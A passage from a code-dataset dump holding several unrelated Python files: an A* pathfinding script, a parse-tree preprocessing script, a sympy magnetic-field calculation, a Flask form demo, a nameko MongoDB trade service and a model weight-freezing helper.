        value_list.append(abs(i - a))\n    mini = min(value_list)\n    for j in xs:\n        if mini + a == j:\n            return j\n        elif mini * -1 + a == j:\n            return j\n        else:\n            pass\n\n\ndef derivative(f, xs):\n    \"\"\"Approximates and returns the derivative of a function f at points in\n    xs\"\"\"\n    delta = 10 ** -6\n    returnlist = []\n    for i in xs:\n        f1 = f(i + delta)\n        f2 = f(i)\n        returnlist.append((f1 - f2) / delta)\n    return returnlist\n\n\ndef read(filename):\n    \"\"\"Reads a comma-separated file filename and returns its fields as a list\"\"\"\n    data0 = open(filename)\n    data1 = data0.read()  # the original called read(data0), recursing forever\n    data0.close()  # close() must be called, not merely referenced\n    data1 = data1.split(',')\n    print(data1)\n    return data1\n\n\ndef isfib(F):\n    \"\"\"Returns true and false given a list F whether or not it is a Fibonacci\n    sequence\"\"\"\n    if len(F) < 2:\n        return False\n    elif F[0] == 0 and F[1] == 1:\n        for i in range(2, len(F)):\n            if F[i] != F[i - 1] + F[i - 2]:\n                return False  # every element must satisfy the recurrence, not just the first\n        return True\n    else:\n        return False\n\n\ndef f_from_data(xs, ys):\n    \"\"\"Returns a function that evaluates the data (xs, ys), interpolating\n    between the given points\"\"\"\n    ys_array = numpy.array(ys)\n    interpolant = scipy.interpolate.interp1d(xs, ys_array)\n\n    def f(x):\n        for i in xs:\n            if x == i:\n                return ys[xs.index(i)]  # exact data point\n        return float(interpolant(x))  # otherwise interpolate between neighbours\n    return f  # return the function itself; the original returned f(x) with x unbound\n","sub_path":"2012-13.py","file_name":"2012-13.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"161415801","text":"# coding:utf-8\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom node import get_node,init_dict_node,calDistance\n# read the csv file\n#\nimport csv\nimport math\n\n# N*N array\n#{'link':0,'G':0,'H':0,'F':0,'label':'t_1_2','cood':(121,222)}\n# NODE_LINK = [[{'label':'a','link':0,'parent':'start','G':0,'H':0,'F':0},{'label':'b','link':1,'parent':'start','G':2,'H':2,'F':0},{'label':'c','link':1,'parent':'start','G':1,'H':1,'F':0},{'label':'d','link':0,'parent':'start','G':0,'H':3.5,'F':0},{'label':'e','link':0,'parent':'start','G':0,'H':8.5,'F':0}],\n#             [{'label':'a','link':1,'parent':'start','G':2,'H':2,'F':0},{'label':'b','link':0,'parent':'start','G':0,'H':0,'F':0},{'label':'c','link':0,'parent':'start','G':0,'H':2.8,'F':0},{'label':'d','link':1,'parent':'start','G':4,'H':4'F':0},{'label':'e','link':0,'parent':'start','G':0,'H':8,'F':0}],\n#             [{'label':'a','link':1,'parent':'start','G':1,'H':1,'F':0},{'label':'b','link':1,'parent':'start','G':2,'H':2,'F':0},{'label':'c','link':1,'parent':'start','G':1,'H':1,'F':0},{'label':'d','link':0,'parent':'start','G':0,'H':3.5,'F':0},{'label':'e','link':0,'parent':'start','G':0,'H':8.5,'F':0}],\n#             [{'label':'a','link':0,'parent':'start','G':0,'H':0,'F':0},{'label':'b','link':1,'parent':'start','G':2,'H':2,'F':0},{'label':'c','link':1,'parent':'start','G':1,'H':1,'F':0},{'label':'d','link':0,'parent':'start','G':0,'H':3.5,'F':0},{'label':'e','link':0,'parent':'start','G':0,'H':8.5,'F':0}],\n#             [{'label':'a','link':0,'parent':'start','G':0,'H':0,'F':0},{'label':'b','link':1,'parent':'start','G':2,'H':2,'F':0},{'label':'c','link':1,'parent':'start','G':1,'H':1,'F':0},{'label':'d','link':0,'parent':'start','G':0,'H':3.5,'F':0},{'label':'e','link':0,'parent':'start','G':0,'H':8.5,'F':0}]]\n# # actual distances between nodes\nNODE_LINK = init_dict_node()\n# map a label to its dimension id\ndict_node = get_node() # {'t_1_1':{'coord':(12,22),'id':0},'t_1_2':{'coord':(5,12),'id':1},'t_1_3':{'coord':(6,8),'id':2},'t_1_4':{'coord':(1,12),'id':3},'t_1_5':{'coord':(1,18),'id':4},'F_1_1':{'coord':(15,12),'id':5},'F_1_2':{'coord':(15,22),'id':6}}\n\nparent_node = {}\nNODE_DISTANCE_G = [[0,0,12],\n                 [22,0,21]]\n# Euclidean distances between nodes\nNODE_DISTANCE_H = [[0,0,12],\n                 [22,0,21]]\n\nNODE_DISTANCE_F = [[0,0,12],\n                 [22,0,21]]\n# nodes already visited\nvisited = []\n\n\nstartNode = (121,22)\ntargetNode = (12,222)\nstart_node_id = 0\ntarget_node_id = 50\n\n\nLAMBDAH = 2.0\n\n# for key in labelToId:\n# \t# print(key,labelToId[key])\n# \topenList = []\n# \tclosedList =[]\n# \troute = []\n# \tcur_node_id = labelToId[key] \n# \tnode_link_arr = NODE_LINK_DISTANCE[cur_node_id]\n# \t# ids of the connected nodes\n# \tnode_link = {}\n# \t# node_link_value = []\n# \tfor item in node_link_arr:\n# \t\t# print(item)\n# \t\tif item != 0:\n# \t\t\tlink_node_id = node_link_arr.index(item)\n# \t\t\tnode_link.append()\n# \t\t\tlink_node_f = f(cur_node_id,link_node_id,target_node_id)\n# \t\t\tnode_link_value[link_node_id] = link_node_f\n\n# \tnode_link_sorted = sorted(node_link.items(), key=lambda x: x[1])\n\n# \tmove_node = node_link_sorted[0]\n# \tmove_node_id = move_node[0]\n\n\n# \t# if len(node_link) == 0:\n# \t\t# pass\n# \t\t# TODO \n\t\n# \tf = f(cur_node_id,link_node_id,target_node_id)\n\n# a) Find the square in the open list with the lowest F value. Call it the current square.\n\n# b) Move it to the closed list.\n\n# c) For each square adjacent to the current square:\n\n# * If it is not walkable or is already in the closed list, skip it. Otherwise:\n\n# * If it is not in the open list, add it. Make the current square its parent and record its F, G and H values.\n\n# * If it is already in the open list, use G to check whether the new path is better. A lower G means a better path. If so, change its parent to the current square and recompute its G and F. If you keep the open list sorted by F, you may need to re-sort it afterwards.\n\n# d) Stop when you\n\n# * add the target square to the closed list (the path has been found), or\n\n# * fail to find the target square and the open list is empty (no path exists).\n# \n\n\ndef astar(start_node_label,target_node_label):\n\tstart_node_id = dict_node[start_node_label]['id']\n\ttarget_node_id = dict_node[target_node_label]['id']\n\topenList = []\n\tclosedList =[]\n\troute = []\n\tcur_node_id = start_node_id\n\tprint('start_node_id',start_node_id)\n\tprint('target_node_id',target_node_id)\n\tNODE_LINK[start_node_id][start_node_id]['parent'] = 'startNode'\n\topenList.append(start_node_id)\n\tfound = False \n\tresign = False \n\tcount = 0\n\n\twhile not found and not resign:\n\n\t\t# print('next step openList:',openList,'closedList:',closedList)\n\n\t\tnode_link_value = {}\n\t\tif cur_node_id == target_node_id:\n\t\t\t\n\t\t\tprint('========================================fuck! I found it=============================================')\n\t\t\t\n\t\t\tfound = True\n\t\t\troute = getRoute(start_node_id,target_node_id)\n\t\t\t# print('route',route)\n\t\t\tbreak\n\n\t\t# print('cur_node_id node index',openList.index(cur_node_id))\n\t\t# remove the current node from the open list\n\t\tdel openList[openList.index(cur_node_id)]\n\t\t# add the current node to the closed list\n\t\tclosedList.append(cur_node_id)\n\n\t\t# if a neighbour is already in the open list, check whether the current path to it is better\n\t\tfor neighbor in get_neighbors_id(cur_node_id):\n\t\t\tprint('neighbor:',neighbor)\n\t\t\tif neighbor not in closedList:\n\n\t\t\t\tG_cur_to_neighbor = get_G(cur_node_id,neighbor)\n\t\t\t\tG_cur_parent = get_P_G(start_node_id,cur_node_id)\n\t\t\t\tH_neighbor = get_H(neighbor,target_node_id)\n\n\t\t\t\tif neighbor in openList:\n\t\t\t\t\tprint('in openList')\n\t\t\t\t\t# in other words, check whether reaching it via the new path gives a lower G; if not, do nothing\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\tG_neighbor = get_P_G(start_node_id,neighbor)\n\n\t\t\t\t\tif G_cur_to_neighbor + G_cur_parent < G_neighbor:\t \n\n\t\t\t\t\t\tparent_node[neighbor] = cur_node_id\n\t\t\t\t\t\tNODE_LINK[start_node_id][neighbor]['parent'] = cur_node_id\n\n\t\t\t\t\t\tNODE_LINK[start_node_id][neighbor]['G'] = G_cur_to_neighbor + G_cur_parent\n\t\t\t\t\t\tNODE_LINK[start_node_id][neighbor]['H'] = H_neighbor\n\t\t\t\t\t\tNODE_LINK[start_node_id][neighbor]['F'] = NODE_LINK[start_node_id][neighbor]['G']+ NODE_LINK[start_node_id][neighbor]['H']\n\n\t\t\t\t\t\t# print('get_F',NODE_LINK[start_node_id][neighbor]['F'])\n\t\t\t\t\t\tnode_link_value[neighbor] = NODE_LINK[start_node_id][neighbor]['F']\n\t\t\t\t\telse:\n\t\t\t\t\t\t# keep the existing path\n\n\t\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tprint('not in openList')\n\t\t\t\t\tparent_node[neighbor] = cur_node_id\n\n\t\t\t\t\tNODE_LINK[start_node_id][neighbor]['parent'] = cur_node_id\n\n\t\t\t\t\tNODE_LINK[start_node_id][neighbor]['G'] = G_cur_to_neighbor + G_cur_parent\n\t\t\t\t\tNODE_LINK[start_node_id][neighbor]['H'] = H_neighbor\n\t\t\t\t\tNODE_LINK[start_node_id][neighbor]['F'] = NODE_LINK[start_node_id][neighbor]['G']+ NODE_LINK[start_node_id][neighbor]['H']\n\n\t\t\t\t\t# print('get_F',NODE_LINK[start_node_id][neighbor]['F'])\n\n\t\t\t\t\tnode_link_value[neighbor] = NODE_LINK[start_node_id][neighbor]['F']\n\t\t\t\t\n\t\t\t\t\topenList.append(neighbor)\n\n\t\t\t# print('openList',openList)\n\t\t# print('node_link_value:',node_link_value)\n\t\t# sort candidates by F score\n\t\tnode_link_sorted = sorted(node_link_value.items(), key=lambda x: x[1])\n\t\t# pick the lowest score\n\t\t\n\t\tmove_node = node_link_sorted[0]\n\t\t# print('move_node',move_node)\n\t\t# get the node id\n\t\tcur_node_id = move_node[0]\n\t\tprint('cur_node_id',cur_node_id)\n\treturn route\n\n\ndef get_neighbors_id(cur_node_id):\n\tnode_link =[]\n\tnode_link_arr = NODE_LINK[cur_node_id]\n\t# find the nodes connected to the current node\n\tfor item in node_link_arr:\n\t\t# print(item)\n\t\tif item['link']!= 0:\n\t\t\tnext_node_id = node_link_arr.index(item)\n\t\t\tnode_link.append(next_node_id)\n\t# print('cur_node_id:',cur_node_id,'neighbors_id:',node_link)\n\treturn node_link\n\n\n# actual distance from a neighbour of the current node back to the start node\ndef get_P_G(start_node_id,link_node_id):\n\n\t# print('get_P_G',NODE_LINK[start_node_id][link_node_id]['G'])\n\treturn NODE_LINK[start_node_id][link_node_id]['G']\n\n# actual distance between the current node and one of its neighbours\ndef get_G(cur_node_id,link_node_id):\n\t# global start_node_id\n\t# print('get_G',NODE_LINK[cur_node_id][link_node_id]['G'])\n\n\treturn NODE_LINK[cur_node_id][link_node_id]['G']\n# estimated distance (Euclidean)\ndef get_H(cur_node_id,target_node_id):\n\t# global start_node_id\n\t# TODO precompute the distance between the two points\n\tdict_node_by_id = sorted(dict_node.items(), key=lambda x: x[1]['id'])\n\tcur_node_coord = dict_node_by_id[cur_node_id][1]['coord']\n\ttarget_node_coord = dict_node_by_id[target_node_id][1]['coord']\n\t# ,cur_node_id,target_node_id,\n\t# print('get_H',calDistance(cur_node_coord,target_node_coord))\n\treturn calDistance(cur_node_coord,target_node_coord)\n\t# return NODE_LINK[cur_node_id][target_node_id]['H']\n\ndef get_F(cur_node_id,link_node_id):\n\tglobal target_node_id\n\treturn get_G(cur_node_id,link_node_id)+get_H(cur_node_id,target_node_id)\n\n\n\n\ndef getRouteLabel(start_node_id,route):\n\tdict_node_by_id = sorted(dict_node.items(), key=lambda x: x[1]['id'])\n\trouteLabel = []\n\t# print('start_node_id',start_node_id,'route:',route)\n\tfor i in route:\n\t\t# print('NODE_LINK',NODE_LINK[start_node_id][i])\n\n\t\tlabel = dict_node_by_id[i][0]\n\t\trouteLabel.append(label)\n\treturn routeLabel\n\n\ndef getRoute(start_node_id,target_node_id):\n\t# closedList\n\t# for i in closedList:\n\t# print(start_node_id,target_node_id)\n\t# print('parent_node',parent_node)\n\n\tfound_route = False\n\troute_node_id = target_node_id\n\n\troute = [target_node_id]\n\troute_dis = NODE_LINK[start_node_id][target_node_id]['G']\n\t# print('NODE_LINK_getRoute',NODE_LINK[start_node_id])\n\twhile not found_route:\n\t\t\n\t\troute_node_id = parent_node[route_node_id]\n\n\t\t\n\n\t\troute.append(route_node_id)\n\n\t\tif int(start_node_id) == int(route_node_id):\n\t\t\t# print('fuck')\n\t\t\tfound_route = True\n\n\n\t# print('getRoute',,'dis',route_dis)\n\n\tresRoute = {'route':getRouteLabel(start_node_id,route),'route_dis':route_dis}\n\treturn resRoute \n\t# NODE_LINK[]\n\n\n\n# print(np.shape(np.array(init_dict_node())))\n\n# print(np.shape(np.array(init_dict_node())[:,1]))\n# print(np.array(init_dict_node())[:,0])\n# print(init_dict_node())\n# def aStar(startNode,targetNode,NODE_LINK,NODE_LINK_DISTANCE):\ndef getAllNodeDis():\n\tdict_node_by_id = sorted(dict_node.items(), key=lambda x: x[1]['id'])\n\tAllNodeDisArr = []\n\tAllNodeDis = {}\n\tfor i in range(len(dict_node_by_id)-4):\n\t# for item in dict_node_by_id:\n\t\t\n\t\tlable = dict_node_by_id[i][0]\n\t\tdis = []\n\t\tfor td in ['td_1','td_2','td_3','td_4']:\n\t\t\tdis_td = astar(lable,td)\n\t\t\tprint('lable',lable,'td',td,'aStar',dis_td)\n\t\t\tdis.append(dis_td)\n\n\t\tAllNodeDis[lable] = dis\n\t\tAllNodeDisArr.append(dis)\n\t# print('AllNodeDis',AllNodeDis)\n\n\tprint('AllNodeDis',len(AllNodeDis),np.shape(AllNodeDisArr))\n\n\treturn AllNodeDis\n\n# shortest path from every node to the four exits\ngetAllNodeDis()\n\n\n\n\n\n\n\n\n# print()\n# dict_node_by_id = sorted(dict_node.items(), key=lambda x: x[1]['id'])\n# cur_node_coord = dict_node_by_id[1][1]['coord']\n# target_node_coord = dict_node_by_id[65][1]['coord']\n\n# print(cur_node_coord,target_node_coord)\n\n\n\n\n\n","sub_path":"astar.py","file_name":"astar.py","file_ext":"py","file_size_in_byte":11042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"371515244","text":"from tree import sentence, ST\nfrom sys import argv\nfrom subprocess import call\nimport numpy as np\nfrom attention import similar\n\nif __name__ == '__main__':\n\ttry:\n\t\tinp = open(argv[1], 'r')\n\t\toup = open(argv[2], 'r')\n\t\toutputfile = argv[3]\n\texcept:\n\t\tprint('Invalid parameters!')\n\t\texit()\n\n\tsources, targets = [], []\n\n\tcount_oup = count_inp = 0 \n\tinvalid = set()\n\n\tx, y = [], []\n\tfor l in inp:\n\t\tif l[0] == '\\n':\n\t\t\tfor i in x:\n\t\t\t\ty += [sentence(i[1])]\n\t\t\tfor i in range(len(x)):\n\t\t\t\tp = x[i]\n\t\t\t\tif 
p[6]:\n\t\t\t\t\ty[i].set_dep(p[7], y[p[6] - 1], i < p[6] - 1)\n\t\t\t\telse:\n\t\t\t\t\tsources += [y[i]]\n\t\t\t\t\tcount_inp += 1\n\t\t\t\tif p[1] in '()[]\\{\\}\\/,.;\\':\"<>!@#$%^&*' and not p[6]:\n\t\t\t\t\tinvalid.add(count_inp)\n\t\t\tx, y = [], []\n\t\t\t\n\t\telse:\n\t\t\tl = l[:-1].split('\\t') #split by tabs\n\t\t\tl[1] = l[1].lower()\n\t\t\tl[0] = int(l[0])\n\t\t\tl[6] = int(l[6])\n\t\t\tx += [l]\n\n\n\tx, y = [], []\n\tfor l in oup:\n\t\tif l[0] == '\\n':\n\t\t\tfor i in x:\n\t\t\t\ty += [sentence(i[1])]\n\t\t\tfor i in range(len(x)):\n\t\t\t\tp = x[i]\n\t\t\t\tif p[6]:\n\t\t\t\t\ty[i].set_dep(p[7], y[p[6] - 1], i < p[6] - 1)\n\t\t\t\telse:\n\t\t\t\t\ttargets += [y[i]]\n\t\t\t\t\tcount_oup += 1\n\t\t\t\tif p[1] in '()[]\\{\\}\\/,.;\\':\"<>!@#$%^&*' and not p[6]:\n\t\t\t\t\tinvalid.add(count_oup)\n\t\t\tx, y = [], []\n\t\t\t\n\t\telse:\n\t\t\tl = l[:-1].split('\\t') #split by tabs\n\t\t\tl[1] = l[1].lower()\n\t\t\tl[0] = int(l[0])\n\t\t\tl[6] = int(l[6])\n\t\t\tx += [l]\n\t\n\tprint('count:', count_inp,count_oup)\n\tprint('lengths:', len(sources),len(targets))\n\n\tsts = []\n\tatts = []\n\tfor i in range(len(targets)):\n\t\tif i + 1 not in invalid:\n\t\t\tst = ST(sources[i], targets[i])\n\t\t\tsts += [st]\n\t\t\tatts += st.get_att()\n\n\n\tprint('attention size:', len(atts))\n\tatts = np.array(list(atts))\n\tsim = similar(atts.T[0], atts.T[1])\n\tsim = {(atts[i, 0], atts[i, 1]): sim[i, 0]\n\t\t for i in range(sim.shape[0])}\n\n\t'''\n\t#using mini-cost maxflow to solve matching\n\tfout = open('temp_sims.txt', 'w')\n\n\tfor st in sts:\n\t\tfout.write(st.get_sim(sim) + '\\n')\n\n\tcall(['./flow', 'temp_sims.txt', '>', 'temp_results.txt'])\n\tfin = open('temp_results.txt', 'r')\n\n\tfor st in sts:\n\t\tpairs = []\n\t\twhile True:\n\t\t\tline = fin.readline()\n\t\t\tif line == '\\n':\n\t\t\t\tbreak\n\t\t\tline = line.split(' ')\n\t\t\tpairs += [(int(line[0]), int(line[1]))]\n\n\t\tif line == '\\n':\n\t\t\tcontinue\n\t\telse:\n\t\t\tst.build_corr(sim, pairs)\n\n\t'''\n\t#brute force matching approximation\n\tfor st in sts:\n\t\tst.build_corr(sim)\n\n\tphrs = []\n\tdeps = []\n\tfor st in sts:\n\t\tphr = st.phr_gen()\n\t\tdep = st.dep_gen()\n\t\tphrs += phr\n\t\tdeps += dep\n\n\tprint('phrs', len(phrs))\n\tprint('deps', len(deps))\n\n\n\tnp.save(outputfile+'_phrs.npy', phrs)\n\tnp.save(outputfile+'_deps.npy', deps)\n","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":2543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"278302861","text":"import sys\n\nimport sympy as sym\nimport numpy as np\nimport scipy as sci\nimport matplotlib.pyplot as plt\nimport seaborn as sbn\nfrom sympy import Integral, Symbol\n\n#Define the symbols\nR = 1\nu = Symbol('u') #The angle theta (with respect to x-axis)\nz2 = Symbol('z2') #This is z'\nr = Symbol('r')\n\n#Define the intresting points\n#Right now I've set these at the origin\n#I could change them to whatever point I want by changing the values\nx = 0\ny = 0\nz = 0\n\n#Define the dx, dy, dz for finite difference approximation\ndx = x + 0.0001\ndy = y + 0.0001\ndz = z + 0.0001\n\n#Define the integrals for part (a)\nax1 = (-R*sym.sin(u)-y) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-y)**2 + (z2-z)**2)**1.5\nay1 = (R*sym.cos(u)-x) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-y)**2 + (z2-z)**2)**1.5\n\nAx1 = Integral(ax1*r, (r, 0, R), (u, 0, 2*sym.pi), (z2, -R, R)).doit()\nAy1 = Integral(ay1*r, (r, 0, R), (u, 0, 2*sym.pi), (z2, -R, R)).doit()\n\n#Define functions for dx in 
part (a)\nax1dx = (-R*sym.sin(u)-y) / ((R*sym.cos(u)-dx)**2 + (R*sym.sin(u)-y)**2 + (z2-z)**2)**1.5\nay1dx = (R*sym.cos(u)-dx) / ((R*sym.cos(u)-dx)**2 + (R*sym.sin(u)-y)**2 + (z2-z)**2)**1.5\n\nAx1dx = Integral(ax1dx*r, (r, 0, R), (u, 0, 2*sym.pi), (z2, -R, R)).doit()\nAy1dx = Integral(ay1dx*r, (r, 0, R), (u, 0, 2*sym.pi), (z2, -R, R)).doit()\n\n#Define functions for dy in part (a)\nax1dy = (-R*sym.sin(u)-dy) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-dy)**2 + (z2-z)**2)**1.5\nay1dy = (R*sym.cos(u)-x) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-dy)**2 + (z2-z)**2)**1.5\n\nAx1dy = Integral(ax1dy*r, (r, 0, R), (u, 0, 2*sym.pi), (z2, -R, R)).doit()\nAy1dy = Integral(ay1dy*r, (r, 0, R), (u, 0, 2*sym.pi), (z2, -R, R)).doit()\n\n#Define functions for dz in part (a)\nax1dz = (-R*sym.sin(u)-y) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-y)**2 + (z2-dz)**2)**1.5\nay1dz = (R*sym.cos(u)-x) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-y)**2 + (z2-dz)**2)**1.5\n\nAx1dz = Integral(ax1dz*r, (r, 0, R), (u, 0, 2*sym.pi), (z2, -R, R)).doit()\nAy1dz = Integral(ay1dz*r, (r, 0, R), (u, 0, 2*sym.pi), (z2, -R, R)).doit()\n\n#Defining the B-field for part (a)\nBx1 = (Ay1dz - Ay1)/dz\nBy1 = (Ax1dz - Ax1)/dz\nBz1 = (Ay1dx - Ay1)/dx - (Ax1dy - Ax1)/dy\n\nprint('For part (a):')\nprint(\"Bx1 = (uM / 4*.pi)*\", Bx1)\nprint(\"By1 = (uM / 4*.pi)*\", By1)\nprint(\"Bz1 = (uM / 4*.pi)*\", Bz1)\n\n\n#Define the integrals for part (b)\nax2 = (-R*sym.sin(u)) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-y)**2 + (z2-z)**2)**0.5\nay2 = (R*sym.cos(u)) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-y)**2 + (z2-z)**2)**0.5\n\nAx2 = Integral(ax2*r, (u, 0, 2*sym.pi), (z2, -R, R)).doit()\nAy2 = Integral(ay2*r, (u, 0, 2*sym.pi), (z2, -R, R)).doit()\n\n#Define functions for dx in part (b)\nax2dx = (-R*sym.sin(u)) / ((R*sym.cos(u)-dx)**2 + (R*sym.sin(u)-y)**2 + (z2-z)**2)**0.5\nay2dx = (R*sym.cos(u)) / ((R*sym.cos(u)-dx)**2 + (R*sym.sin(u)-y)**2 + (z2-z)**2)**0.5\n\nAx2dx = Integral(ax2dx*r, (u, 0, 2*sym.pi), (z2, -R, R)).doit()\nAy2dx = Integral(ay2dx*r, (u, 0, 2*sym.pi), (z2, -R, R)).doit()\n\n#Define functions for dy in part (b)\nax2dy = (-R*sym.sin(u)) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-dy)**2 + (z2-z)**2)**0.5\nay2dy = (R*sym.cos(u)) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-dy)**2 + (z2-z)**2)**0.5\n\nAx2dy = Integral(ax2dy*r, (u, 0, 2*sym.pi), (z2, -R, R)).doit()\nAy2dy = Integral(ay2dy*r, (u, 0, 2*sym.pi), (z2, -R, R)).doit()\n\n#Define functions for dz in part (b)\nax2dz = (-R*sym.sin(u)) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-y)**2 + (z2-dz)**2)**0.5\nay2dz = (R*sym.cos(u)) / ((R*sym.cos(u)-x)**2 + (R*sym.sin(u)-y)**2 + (z2-dz)**2)**0.5\n\nAx2dz = Integral(ax2dz*r, (u, 0, 2*sym.pi), (z2, -R, R)).doit()\nAy2dz = Integral(ay2dz*r, (u, 0, 2*sym.pi), (z2, -R, R)).doit()\n\n#Defining the B-field for part (b)\nBx2 = (Ay2dz - Ay2)/dz\nBy2 = (Ax2dz - Ax2)/dz\nBz2 = (Ay2dx - Ay2)/dx - (Ax2dy - Ax2)/dy\n\nprint('For part (b):')\nprint(\"Bx2 = (uM / 4*.pi)*\", Bx2)\nprint(\"By2 = (uM / 4*.pi)*\", By2)\nprint(\"Bz2 = (uM / 4*.pi)*\", Bz2)\n","sub_path":"A9Q6.py","file_name":"A9Q6.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"149108175","text":"from logging import debug\r\nfrom os import read\r\nfrom flask import Flask,render_template,request,session,flash\r\nimport flask\r\nfrom flask_wtf import FlaskForm\r\nfrom flask_wtf.form import _is_submitted\r\nfrom wtforms import TextField,SubmitField,BooleanField,RadioField,SelectField,TextAreaField\r\nfrom wtforms import 
validators\r\nfrom wtforms.validators import DataRequired\r\nfrom flask_bootstrap import Bootstrap\r\n\r\n\r\napp = Flask(__name__)\r\napp.config['SECRET_KEY'] = 'mykey'\r\nBootstrap(app)\r\n\r\n\r\nclass MyForm(FlaskForm):\r\n name = TextField(\"ป้อนชื่อของคุณ\",validators=[DataRequired()])\r\n address = TextAreaField('ป้อนที่อยู่ของคุณ',validators=[DataRequired()])\r\n isAccept = BooleanField(\"ยอมรับเงื่อนไข\",validators=[DataRequired()])\r\n gender = RadioField('gender',choices=[('male','ชาย'),('Female','หญิง'),('trans','อื่นๆ')],validators=[DataRequired()])\r\n skill = SelectField('ความสามารถ',choices=[('Python','Python'),('C++','C++'),('CSS/HTML','CSS/HTML'),('Java','Java')],validators=[DataRequired()])\r\n submit = SubmitField(\"บันทึกข้อมูล\",validators=[DataRequired()])\r\n\r\n\r\n\r\n@app.route('/',methods=['get','post'])\r\ndef index():\r\n\r\n # name = False\r\n # form = MyForm()\r\n # isAccept= False\r\n # gender = False\r\n # skill = False\r\n # address = False\r\n form = MyForm()\r\n if form.validate_on_submit():\r\n\r\n session['name']= form.name.data\r\n session['isAccept']= form.isAccept.data\r\n session['gender']= form.gender.data\r\n session['skill'] = form.skill.data\r\n session['address']= form.address.data\r\n # clearData\r\n form.name.data = \"\"\r\n form.isAccept.data = \"\"\r\n form.gender.data = \"\"\r\n form.skill.data = \"\"\r\n form.address.data = \"\"\r\n\r\n\r\n # data = {\"name\":\"Bot02\",\"age\":\"22\",\"salary\":\"150000\"}\r\n # return render_template(\"index.html\",form = form,name=name,isAccept=isAccept,gender=gender,skill=skill,address=address)\r\n return render_template(\"index.html\",form=form)\r\n\r\n\r\n\r\n@app.route('/boostarp',methods=['get','post'])\r\ndef index_boostrap():\r\n\r\n # name = False\r\n # form = MyForm()\r\n # isAccept= False\r\n # gender = False\r\n # skill = False\r\n # address = False\r\n form = MyForm()\r\n if form.validate_on_submit():\r\n\r\n flash(\"บันทึกข้อมูลเรียบร้อย\")\r\n\r\n session['name']= form.name.data\r\n session['isAccept']= form.isAccept.data\r\n session['gender']= form.gender.data\r\n session['skill'] = form.skill.data\r\n session['address']= form.address.data\r\n # clearData\r\n form.name.data = \"\"\r\n form.isAccept.data = \"\"\r\n form.gender.data = \"\"\r\n form.skill.data = \"\"\r\n form.address.data = \"\"\r\n\r\n\r\n # data = {\"name\":\"Bot02\",\"age\":\"22\",\"salary\":\"150000\"}\r\n # return render_template(\"index.html\",form = form,name=name,isAccept=isAccept,gender=gender,skill=skill,address=address)\r\n return render_template(\"index_boostrap.html\",form=form)\r\n\r\n@app.route('/about')\r\ndef about():\r\n product = [\"เสื้อผ้า\",\"เตารีด\",\"ผ้าห่ม\",\"ยาสามัญ\"]\r\n return render_template(\"about.html\",Myproduct = product)\r\n\r\n@app.route('/admin')\r\ndef admin():\r\n #ชื่อ อายุ\r\n name = \"bot01\"\r\n age = 30\r\n return render_template(\"admin.html\",Myname = name,Myage = age)\r\n\r\n@app.route('/seddata')\r\ndef sigupfrom():\r\n fname=request.args.get('fname')\r\n descriptio = request.args.get('description')\r\n return render_template('thankyou.html',data={\"name\":fname,\"description\":descriptio})\r\n\r\n# @app.route('/user//')\r\n# def member(name,age):\r\n# return \"Hello member : {} , age : {}\".format(name,age)\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)","sub_path":"flask_basic/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} 
+{"seq_id":"509439820","text":"from nameko.rpc import rpc\nfrom nameko_mongokit.database import Document, Collection\nimport json\n\n\nclass Trade:\n name = 'trade'\n\n collection = Collection(doc_name='meihao', host='localhost', port=27017)\n orders = collection\n\n @rpc\n def get(self, data=None):\n \"\"\"\n 获取单笔交易的部分信息\n \"\"\"\n try:\n kwargs = data.get('fields')\n d = self.orders.find_one(kwargs)\n print(self.orders)\n if d is not None:\n d.pop('_id')\n result = {\n 'trade_get_response': {\n 'trade': d,\n }\n }\n return json.dumps(result)\n except Exception as e:\n result = {\n 'error_response': {\n 'sub_msg': '非法参数',\n 'code': 50,\n 'sub_code': 'isp.trade-service-failed',\n 'msg': 'Remote service error. {}'.format(e),\n }\n }\n return json.dumps(result)\n\n @rpc\n def close(self, data=None):\n result = {\n 'trade_close_response': {\n 'trade': {\n 'tid': 200,\n }\n }\n }\n return json.dumps(result)\n\n","sub_path":"v1_0/trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"141552635","text":"def freeze_prefix1(model):\n base_prefix = []\n params = [p for n, p in model.named_parameters() if not any(nd in n for nd in [\"CEFR_matrices\"])]\n for par in params:\n par.requires_grad = False\n\ndef transfer_prefix1(model,model_base):\n\n params = model.named_parameters()\n params_base_ = model_base.named_parameters()\n dict_params = dict(params)\n params_base = [(n,p) for n, p in model_base.named_parameters() if not any(nd in n for nd in base_prefix)]\n\n\n for name_base, param_base in params_base:\n dict_params[name_base].data.copy_(param_base.data)\n\n model_base.load_state_dict(dict_params)\n\n\n\n\n\n","sub_path":"transformers/GEC/transfer_weights.py","file_name":"transfer_weights.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} 